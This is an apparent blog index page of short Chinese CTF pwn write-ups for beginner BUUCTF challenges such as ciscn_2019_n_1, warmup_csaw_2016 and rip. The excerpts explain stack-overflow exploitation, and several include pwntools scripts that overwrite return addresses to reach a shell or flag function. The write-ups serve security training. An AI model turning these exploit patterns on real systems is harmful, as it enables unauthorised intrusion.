BU pwn
theThreeDay
这个作者很懒,什么都没留下…
展开
-
jarvisoj_level0
先checksec检查,64位ida打开,查看字符串跟进去也就是已经有了后门函数,返回道这里就可以获取shell权限main函数里只有俩句话,很明显进入第二句,看到输入点read函数给输入0x200个,buf只有0x80大小,足够栈溢出.0x80+8) * a + 输入点地址flag{d5b703c0-22d2-4df3-a3ab-25479404e50e}...原创 2021-01-17 19:16:58 · 157 阅读 · 0 评论 -
ciscn_2019_n_1
检查,64位ida查看又是gets函数,思路来了,一直输入挤满栈,直到v2处输入11.2812511.28125的16进制转换是 0x41348000h脚本from pwn import*r = remote(“node3.buuoj.cn”,29950)flag_addr = 0x41348000payload = “a”*(0x30-0x4)+p64(flag_addr)r.sendline(payload)r.interactive()0x30 - 0x4 就是v1到v2处的空原创 2021-01-15 14:07:20 · 420 阅读 · 2 评论 -
pwn1_sctf_2016
附件是个32位的程序,ida查看字符串里看到 记住地址,然后看主函数,fgets从 edate 中 最多读取 32位 字符存放到 s 中s大小位0x3c,也就是60,所以栈溢出远远不够15,17行从v4到v5首地址的范围内,输入you,就是v4=you从v6到v7首地址的范围内,输入I, v6=Ireplace就是把I 和 you 替换,v4,v6替换脚本s有60个,也就是20个"I",32位exp是4个字节,加上输入点地址(get_flag)资格字节from pw原创 2021-01-15 13:24:47 · 111 阅读 · 0 评论 -
warmup_csaw_2016 1
先checksec 是64位,小端序进入ida,查看字符串有一个cat flag 的字符串,跟进去,是这个函数,也就是执行这个函数我们就可以得到flag一如既往的来到了main 函数处,也是看到了get函数,一般就是栈溢出了,v5的大小位0x40,再加上是64位,所以要输入0x40+8,来造成栈溢出脚本from pwn import*r=remote(‘node3.buuoj.cn’,28011)flag_addr = 0x40060Dpayload = ‘a’*(0x40+8)+p6原创 2021-01-13 19:35:35 · 807 阅读 · 0 评论 -
rip 1
打开虚拟机,checksec,查看文件基本信息64位,小端序拖入相应ida,查看伪代码.在fun函数里看到了这个(通过字符串也可以转到这里)system("/bin/sh")这个函数可以帮助我们获取shell权限,他的地址main函数里有一个gets函数,这个函数是不会限制输入的字符长度的,一般来说,可以利用这点,来做栈溢出编写一个exp的基本框架:from pwn import *DEBUG # 自己设定值 在本地调试还是远程利用 当然这只是一种相对规范的写法,不写也无所谓if原创 2021-01-13 10:30:25 · 231 阅读 · 0 评论 -
test_your_nc
附件用ida打开,因为直接执行了system,直接nc就可以了,打开虚拟机,nc靶场,把题目给的冒号改成空格ls查看文件cat flag 获取flag原创 2021-01-12 09:23:34 · 582 阅读 · 0 评论